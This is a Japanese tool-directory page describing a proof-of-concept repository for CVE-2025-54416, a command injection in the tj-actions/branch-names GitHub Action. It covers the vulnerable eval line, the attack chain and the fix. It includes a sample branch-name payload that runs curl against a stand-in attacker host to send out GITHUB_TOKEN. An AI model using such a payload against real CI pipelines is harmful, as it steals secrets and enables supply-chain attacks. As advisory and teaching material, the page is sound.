Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
atlas-tj-actions-poc — CVE-2025-54416 tj-actions/branch-names コマンドインジェクションのPoC | Kitploit
ツール/GitHubGitHub/hexbornestudio/atlas-tj-actions-poc
脆弱性分析エクスプロイトデータ流出コマンド&コントロールサプライチェーンセキュリティ学習と教育
GitHubhexbornestudio/atlas-tj-actions-poc

atlas-tj-actions-poc

CVE-2025-54416 tj-actions/branch-names コマンドインジェクションのPoC

リポジトリを見る
35ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-54416: tj-actions/branch-names コマンドインジェクション PoC

このリポジトリは CVE-2025-54416 をデモンストレーションします。これは tj-actions/branch-names における重大なコマンドインジェクションの脆弱性であり、5,000以上の公開リポジトリに影響を与えます。

脆弱性

tj-actions/branch-names GitHub Action (バージョン <= 8.2.1) は、安全でない eval printf "%s" を使用しており、適切なサニタイズ後もコマンドインジェクションのリスクを再導入します。

root@kitploit:~
# Vulnerable code pattern in tj-actions/branch-names:
echo "base_ref_branch=$(eval printf "%s" "$BASE_REF")" >> "$GITHUB_OUTPUT"

攻撃チェーン

  1. 攻撃者がシェルコマンドを含む悪意のある名前のブランチを作成する
  2. 被害者のワークフローが tj-actions/[email protected] を使用してブランチ名を抽出する
  3. 抽出されたブランチ名(攻撃者のペイロードを含む)が後続のシェルコマンドで使用される
  4. コマンドはCIランナーコンテキストでランナーの権限で実行される
  5. シークレット(AWSキー、GITHUB_TOKENなど)が外部に流出する

ペイロード例

ブランチ名: main$(curl https://attacker.com/exfil?secret=$GITHUB_TOKEN)

ワークフローが実行されるとき:

root@kitploit:~
echo "IMAGE_TAG=${{ steps.branch-name.outputs.current_branch }}"
# Actual output: IMAGE_TAG=main$(curl https://attacker.com/exfil?secret=$GITHUB_TOKEN)
# The $(...) is evaluated by the shell, exfiltrating GITHUB_TOKEN

影響

  • 機密シークレットの窃取(AWSキー、APIトークン、GITHUB_TOKEN)
  • 不正なコード変更
  • 本番レジストリへの悪意のあるイメージのプッシュ
  • 侵害されたCI/CDを介したサプライチェーン攻撃

修正方法

tj-actions/branch-names@v9 以降に更新してください。これにより、eval printf "%s" が安全な printf 呼び出しに置き換えられます。

参考文献

  • GitHub Advisory GHSA-gq52-6phf-x2r6
  • CVE-2025-54416
ツールをダウンロード